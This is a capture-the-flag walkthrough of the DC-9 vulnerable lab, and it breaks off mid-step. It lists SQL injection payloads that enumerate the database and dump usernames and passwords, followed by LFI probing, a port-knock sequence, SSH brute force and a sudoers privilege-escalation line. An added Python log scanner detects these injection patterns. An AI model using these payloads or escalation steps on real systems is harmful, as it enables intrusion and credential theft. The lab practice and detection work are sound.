DC: 9 — Walkthrough/Writeup
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Enumeration
More Enumeration…
- Enumerating the port 80:
- Nikto Scan
- Gobuster
- Manual Enumeration
Found nothing in the website source code, but while going through the site map generated by the manual enumeration in Burp, I found 2 possible injection points.
Ref: http://www.unixwiz.net/techtips/sql-injection.html
- /results.php
payload: a' OR 'x'='x
url-encoded: %61%27%20%4f%52%20%27%78%27%3d%27%78
Then I used sqlmap to confirm it.
Payload: a' union all select 1,2,3,4,5,6 -- -
url-encoded: %61%27%20%75%6e%69%6f%6e%20%61%6c%6c%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d
Let's extract the data without using sqlmap; the payloads used are listed below:
- a' OR '1'='1
- a' UNION ALL SELECT 1,2,3,4,5 -- -
- a' union all select 1,2,@@version,4,5,6 -- -
- a' union all select 1,2,3,4,5,schema_name FROM information_schema.schemata -- -
- a' union all select 1,2,3,4,table_schema,table_name FROM information_schema.tables -- -
- a' union all select 1,2,CONCAT(TABLE_SCHEMA,":",TABLE_NAME),3,4,5 FROM information_schema.columns -- -
Results (DB:Table):
Staff:StaffDetails / Staff:Users / users:UserDetails
- a' union all select 1,2,CONCAT(COLUMN_NAME,":",TABLE_SCHEMA,":",TABLE_NAME),3,4,5 FROM information_schema.columns -- -
- a' union all select 1,2,CONCAT(COLUMN_NAME,":",TABLE_SCHEMA,":",TABLE_NAME),3,4,5 FROM information_schema.columns where TABLE_SCHEMA="Staff" OR TABLE_SCHEMA="users" -- -
Exfiltration
- a' union all select 1,2,CONCAT(username,":",password),3,4,5 FROM Staff.Users -- -
admin:856f5de590ef37314e7c3bdf6f8a66dc
- a' union all select 1,2,CONCAT(username,":",password),3,4,5 FROM users.UserDetails -- -
marym:3kfs86sfd
julied:468sfdfsd2
fredf:4sfd87sfd1
barneyr:RocksOff
tomc:TC&TheBoyz
jerrym:B8m#48sd
wilmaf:Pebbles
bettyr:BamBam01
chandlerb:UrAG0D!
joeyt:Passw0rd
rachelg:yN72#dsd
rossg:ILoveRachel
monicag:3248dsds7s
phoebeb:smellycats
scoots:YR3BVxxxw87
janitor:Ilovepeepee
janitor2:Hawaii-Five-0
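From the defender's side, the same enumeration and exfiltration requests above leave a clear trail in the web server's access log. As an added example (not part of the original writeup), this small Python scanner decodes query parameters from access-log lines and flags the indicators seen in these payloads: UNION SELECT, information_schema, @@version, the OR tautology and the trailing `-- -` comment terminator. The log lines, client IP, timestamps and the `search` parameter name are constructed assumptions; the payload strings are the writeup's own.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed sample access log (hypothetical client IP, timestamps and "search" parameter).
# Lines 2-5 carry the writeup's payloads, percent-encoded as a browser would submit them.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /results.php?search=Mary HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2024:10:00:07 +0000] "GET /results.php?search=%61%27%20%4f%52%20%27%78%27%3d%27%78 HTTP/1.1" 200 2048
192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /results.php?search=%61%27%20%75%6e%69%6f%6e%20%61%6c%6c%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d HTTP/1.1" 200 2100
192.0.2.10 - - [01/Jan/2024:10:00:15 +0000] "GET /results.php?search=a%27%20union%20all%20select%201,2,3,4,5,schema_name%20FROM%20information_schema.schemata%20--%20- HTTP/1.1" 200 2200
192.0.2.10 - - [01/Jan/2024:10:00:20 +0000] "GET /results.php?search=a%27%20union%20all%20select%201%2C2%2CCONCAT%28username%2C%22%3A%22%2Cpassword%29%2C3%2C4%2C5%20FROM%20Staff.Users%20--%20- HTTP/1.1" 200 2300
"""
# Indicator name and the case-insensitive pattern applied to each decoded parameter value.
INDICATORS = [
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("information-schema", re.compile(r"\binformation_schema\b", re.I)),
    ("version-probe", re.compile(r"@@version", re.I)),
    ("tautology", re.compile(r"\bor\s+'[^']*'\s*=\s*'", re.I)),
    ("comment-terminator", re.compile(r"--[\s-]*$")),
]
# Request field of a combined-format log line: "<method> <target> HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def check_value(value):
    """Names of every indicator that fires on one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]

def scan_line(line):
    """(path, {param: [indicator, ...]}) for one log line, or None if it has no request field."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes each value exactly once (%27 -> ', %2c -> ,), so the patterns
    # see the string the database would have received.
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name, values in params.items():
        for v in values:
            found = check_value(v)
            if found:
                hits.setdefault(name, []).extend(found)
    return parts.path, hits

def scan_log(text):
    """(line_number, path, hits) for every line on which at least one indicator fires."""
    flagged = []
    for n, line in enumerate(text.splitlines(), 1):
        res = scan_line(line)
        if res and res[1]:
            flagged.append((n, res[0], res[1]))
    return flagged
```

On the sample log only the benign `search=Mary` request passes; the four payload lines are each reported with the indicators that fired, which is the kind of signal a WAF rule or log alert for this endpoint would key on.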
Logging In
admin:856f5de590ef37314e7c3bdf6f8a66dc
admin:transorbital1
The "File does not exist" message stood out to me, so I tested for possible LFI/RFI using wfuzz.
Let’s use wfuzz to find some config files,
So, let’s see the knockd config file,
Sequence: 7469,8475,9842
Brute Force SSH
login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee
Login as fredf:
Searching for the file test.py:
Hence, I made a file with the contents:
fredf ALL=(ALL) ALL
and executed the following command,